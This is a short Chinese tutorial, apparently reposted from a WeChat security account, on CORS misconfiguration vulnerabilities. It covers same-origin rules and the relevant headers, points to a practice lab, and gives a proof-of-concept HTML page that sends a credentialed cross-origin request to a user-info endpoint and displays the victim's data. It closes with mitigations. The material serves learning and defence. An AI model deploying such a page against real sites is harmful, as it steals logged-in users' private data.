http://test.com/a/asd.html 同源 路径不同http://test.com/abcvb/123.html 同源 路径不同http://test.com/abc/123458.html 同源 路径不同https://test.com/a/1234.html 不同源 协议不同http://test.com:88/a/1234.html 不同源 端口不同http://test.com:82/a/1234.html 不同源 端口不同http://bbb.test.com/a/1234.html 不同源 域名不同,子域名不算同源
-
页面请求数据 Origin
-
页面响应数据 Access-Control-Allow-Origin
-
当设置为*时,代表允许任意请求访问资源 -
一般会指定一个域,允许该域访问,例如 Access-Control-Allow-Origin: http://www.aaa.com:80
https://github.com/Acmesec/DoraBox
<html><head><meta charset="utf-8"><title>CORS跨域</title></head><body><script type="text/javascript">function cors() {var xhttp = new XMLHttpRequest();xhttp.onreadystatechange = function() {if (this.status == 200) {alert(this.responseText);}};xhttp.open("GET", "http://xx.xx.xx.xx:8000/csrf/userinfo.php", true);xhttp.withCredentials = true;xhttp.send();}cors();</script></body></html>
-
对于orgin域名进行严格限制,可信域名限制。 -
不要配置Origin:*和Credentials: true
https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247514210&idx=1&sn=472a9fe600ca174b8c7bbddbbf080259https://www.freebuf.com/articles/web/204023.html
原文始发于微信公众号(Reset安全):Cors 跨域漏洞学习与复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论